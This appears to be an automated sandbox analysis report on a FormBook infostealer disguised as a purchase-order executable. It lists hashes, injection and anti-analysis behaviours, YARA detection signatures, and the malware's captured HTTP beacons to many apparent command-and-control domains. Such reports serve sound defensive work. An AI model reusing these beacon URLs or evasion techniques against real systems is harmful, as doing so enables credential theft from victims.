Play interactive tour

Edit tour

Analysis Report Purchase Order 40,7045.exe

Overview

General Information

Sample Name:	Purchase Order 40,7045.exe
Analysis ID:	321387
MD5:	2566aac2faf57e27d8778f2c61bac6d3
SHA1:	b163ec807fe59a0f85f2d964fe1e8ffa8adab77e
SHA256:	7d4d5ddf016f84445c94bf5ee4d715be092f8711b70ebd17f48f2956fba0487d
Tags:	exe
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Executable has a suspicious name (potential lure to open the executable)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Uses netsh to modify the Windows network and firewall settings

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

Purchase Order 40,7045.exe (PID: 6916 cmdline: 'C:\Users\user\Desktop\Purchase Order 40,7045.exe' MD5: 2566AAC2FAF57E27D8778F2C61BAC6D3)

Purchase Order 40,7045.exe (PID: 6932 cmdline: C:\Users\user\Desktop\Purchase Order 40,7045.exe MD5: 2566AAC2FAF57E27D8778F2C61BAC6D3)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

netsh.exe (PID: 6984 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

cmd.exe (PID: 5700 cmdline: /c del 'C:\Users\user\Desktop\Purchase Order 40,7045.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
0.2.Purchase Order 40,7045.exe.9a0000.3.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Purchase Order 40,7045.exe.9a0000.3.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x837a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x90f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18367:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x193da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Purchase Order 40,7045.exe.9a0000.3.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15289:$sqlite3step: 68 34 1C 7B E1 0x1539c:$sqlite3step: 68 34 1C 7B E1 0x152b8:$sqlite3text: 68 38 2A 90 C5 0x153dd:$sqlite3text: 68 38 2A 90 C5 0x152cb:$sqlite3blob: 68 53 D8 7F 8C 0x153f3:$sqlite3blob: 68 53 D8 7F 8C
1.2.Purchase Order 40,7045.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.Purchase Order 40,7045.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x837a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x90f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18367:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x193da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.Purchase Order 40,7045.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15289:$sqlite3step: 68 34 1C 7B E1 0x1539c:$sqlite3step: 68 34 1C 7B E1 0x152b8:$sqlite3text: 68 38 2A 90 C5 0x153dd:$sqlite3text: 68 38 2A 90 C5 0x152cb:$sqlite3blob: 68 53 D8 7F 8C 0x153f3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 7 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.cashintl.com/igqu/?JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Show sources

Source: Purchase Order 40,7045.exe	Virustotal: Detection: 40%			Perma Link
Source: Purchase Order 40,7045.exe	ReversingLabs: Detection: 33%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: Purchase Order 40,7045.exe

Joe Sandbox ML: detected

Source: 0.2.Purchase Order 40,7045.exe.7f0000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 4x nop then pop edi	1_2_00415044
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 4x nop then pop edi	1_2_00415C88
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 4x nop then pop ebx	1_2_004066DA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi	3_2_02DE5044
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop ebx	3_2_02DD66DA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi	3_2_02DE5C88

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49730
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 13.248.196.204:80 -> 192.168.2.3:49750
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49752

Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA HTTP/1.1Host: www.ownumo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=donhjXNh7kLY1iCc+SlENWzt8x7IoGbTUq/N2y8xDHDKv1jZWtQO4VPvuCjZtFGhRuQ3&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.trafegopago.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=EbC/lMdsFrxYIRmxU9JVdurtFZV4D4JG65XX9u0TQDrH/vXXo4aXqz2TK/FSo60698x+ HTTP/1.1Host: www.coveloungewineandwhiskey.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=cBWwxeNBZw14c0R1jn0Ws/yQjDXlXErbhexqVqcZJ/j9HX594bSs/9hubjzw4SjFPh4C&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.covid19salivatestdirect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4hm34ORqosTB HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=gtAjDyhewVv0wP+pLldDDzZVOHZuvXFhM8dcKQ7x+XbEhwRlJbrCtCBURlOjpb7ofbaF&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.primeworldgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MP3xgLgHQaOW HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47oBU/CZqG/X0&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.hyx20140813.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=+vzchlDpP8hhVSy3W5GjgGJ1ZPT8aqTFt8VTi3L78WqIr+4DtdDaKL74hph6Iza73r7P HTTP/1.1Host: www.obsessingwealth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.cashintl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=hBI3Otxb8cB+II9lzJ/uJul9cug51W/gKrRcuXZMLk1SgBX4+5ai4onE9bbZmy8EPFIt HTTP/1.1Host: www.namofast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=SGVuGExhnGF4yxDyK5xX6Vc4jl6qy7oMTqbPjfmzMsQE0E0I89iRcikd677eURgEdiQj&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.plantpowered.energyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=iX1DJYif3eJ2qCI9y9y3neEoNBEbwEqOJ7CoPPWNank/pdm5KGiwxeIXvmA+SDcpynqB&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.capitalcitybombers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHFEaROkrMNd5 HTTP/1.1Host: www.chemtradent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA HTTP/1.1Host: www.ownumo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 160.153.136.3 160.153.136.3

Source: Joe Sandbox View	ASN Name: SOFTLAYERUS SOFTLAYERUS
Source: Joe Sandbox View	ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Source: Joe Sandbox View	ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK

Source: global traffic	HTTP traffic detected: GET /igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA HTTP/1.1Host: www.ownumo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?JBZ0nHS=donhjXNh7kLY1iCc+SlENWzt8x7IoGbTUq/N2y8xDHDKv1jZWtQO4VPvuCjZtFGhRuQ3&BZ=E2J8Yj-0_Jl HTTP/1.1Host: www.trafegopago.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
